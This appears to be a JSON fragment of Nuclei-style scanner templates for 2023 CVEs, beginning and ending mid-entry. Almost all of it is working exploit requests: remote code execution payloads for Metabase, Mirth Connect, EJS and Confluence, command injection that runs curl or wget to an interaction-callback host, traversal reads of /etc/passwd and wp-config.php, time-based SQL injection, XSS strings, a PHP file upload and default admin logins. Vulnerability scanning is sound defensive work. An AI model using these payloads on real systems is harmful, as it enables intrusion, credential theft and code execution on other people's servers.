/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-6389","info":{"name":"WordPress Toolbar <= 2.2.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-6623","info":{"name":"Essential Blocks < 4.4.3 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"}","{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","regex('root:.*:0:0:', body_1)","contains(body_2, \"Essential Blocks \u2013 Page\")"],"condition":"and"}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35162","info":{"name":"XWiki < 14.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"name=\\\"xcontinue\\\" value=\\\"javascript:alert(document.domain)\")","contains(body, \"previewactions.vm\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-37679","info":{"name":"NextGen Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <dynamic-proxy>\n        <interface>java.lang.Comparable</interface>\n        <handler class=\"java.beans.EventHandler\">\n            <target class=\"java.lang.ProcessBuilder\">\n                <command>\n                    <string>curl</string>\n                    <string>http://{{interactsh-url}}/</string>\n                </command>\n            </target>\n            <action>start</action>\n        </handler>\n    </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-44813","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["initInviteFriendBtn('model');alert(document.domain)//;"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5830","info":{"name":"ColumbiaSoft DocumentLocator - Improper Authentication","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /api/authentication/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\n  \"LoginType\":\"differentWindows\",\n  \"User\":\"{{randstr}}\",\n  \"Password\":\"{{rand_base(5, \"abc\")}}\",\n  \"Domain\":\"{{randstr}}\",\n  \"Server\":\"{{interactsh-url}}\",\n  \"Repository\":\"{{randstr}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"Authorized\":false"]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27584","info":{"name":"Dragonfly2 < 2.1.0-beta.1 - Hardcoded JWT Secret","severity":"critical"},"requests":[{"raw":["GET /api/v1/users HTTP/1.1\nHost: {{Hostname}}\nCookie: jwt={{generate_jwt(payload,\"HS256\",\"Secret Key\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"created_at\":","\"updated_at\":","\"state\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1892","info":{"name":"Sidekiq < 7.0.8 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/queues"],"matchers":[{"type":"word","internal":true,"part":"body","words":["Sidekiq","Dashboard</a>"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src/onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39108","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29827","info":{"name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2023-46359","info":{"name":"cPH2 Charging Station v1.87.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>SUCCESS</b>","127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34751","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&page=groups&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2745","info":{"name":"WordPress Core <=6.2 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"DB_NAME\", \"DB_PASSWORD\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-5556","info":{"name":"Structurizr on-premises - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /signin HTTP/1.1\nHost: {{Hostname}}\n","POST /login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf={{csrf}}&hash=\n","GET /dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /workspace/create HTTP/1.1\nHost: {{Hostname}}\n","GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1\nHost: {{Hostname}}\n"],"attack":"pitchfork","payloads":{"username":["structurizr"],"password":["password"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<a href=\"/dashboard\">","Sign out"],"condition":"and"},{"type":"word","part":"body_5","words":["\");alert(document.domain);//","Structurizr"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"([0-9a-z-]+)\""],"internal":true},{"type":"regex","name":"workspace","group":1,"part":"header","regex":["\\/workspace\\/([0-9]+)\\?scriptNonce="],"internal":true}]}]},{"id":"CVE-2023-5360","info":{"name":"WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"uploaded_file\"; filename=\"{{file}}.ph$p\"\nContent-Type: image/png\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"allowed_file_types\"\n\nph$p\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"triggering_event\"\n\nclick\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"wpr_addons_nonce\"\n\n{{nonce}}\n-----------------------------318949277012917151102295043236--\n","GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["WprConfig\\s*=\\s*{[^}]*\"nonce\"\\s*:\\s*\"([^\"]*)\""],"internal":true},{"type":"regex","name":"filename","part":"body_2","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/wpr-addons\\\\\\/forms\\\\\\/(.*?).php"],"internal":true}]}]},{"id":"CVE-2023-39007","info":{"name":"OPNsense - Cross-Site Scripting to RCE","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["openDialog('0'+alert(document.domain)+''"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50290","info":{"name":"Apache Solr - Host Environment Variables Leak via Metrics API","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/admin/metrics"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"responseHeader\":","\"solr.jetty\":","system.env"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5914","info":{"name":"Citrix StoreFront - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/Citrix/teststoreAuth/SamlTest"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(1)</script>\", \"XmlException\")"],"condition":"and"}]}]},{"id":"CVE-2023-47684","info":{"name":"Essential Grid <= 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","lightbox"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4973","info":{"name":"Academy LMS 6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_tution_class_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_duration%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"List of tuitions\")"],"condition":"and"}]}]},{"id":"CVE-2023-0777","info":{"name":"modoboa  2.0.4 - Admin TakeOver","severity":"critical"},"requests":[{"raw":["GET /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F\n","GET /dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["password"]},"attack":"pitchfork","host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"Dashboard\") && contains(body_3, \"Hello admin\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"header","name":"csrftoken","internal":true,"group":1,"regex":["csrftoken=([A-Za-z0-9]+)"]}]}]},{"id":"CVE-2023-50719","info":{"name":"XWiki < 4.10.15 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=","{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["hash:SHA</span>","XWikiUsers[0].password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22527","info":{"name":"Atlassian Confluence - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\n\nlabel=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))\n\n"],"matchers":[{"type":"dsl","dsl":["x_vuln_check != \"\"","contains(to_lower(body), 'empty{name=')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["x_vuln_check"]}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34752","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php 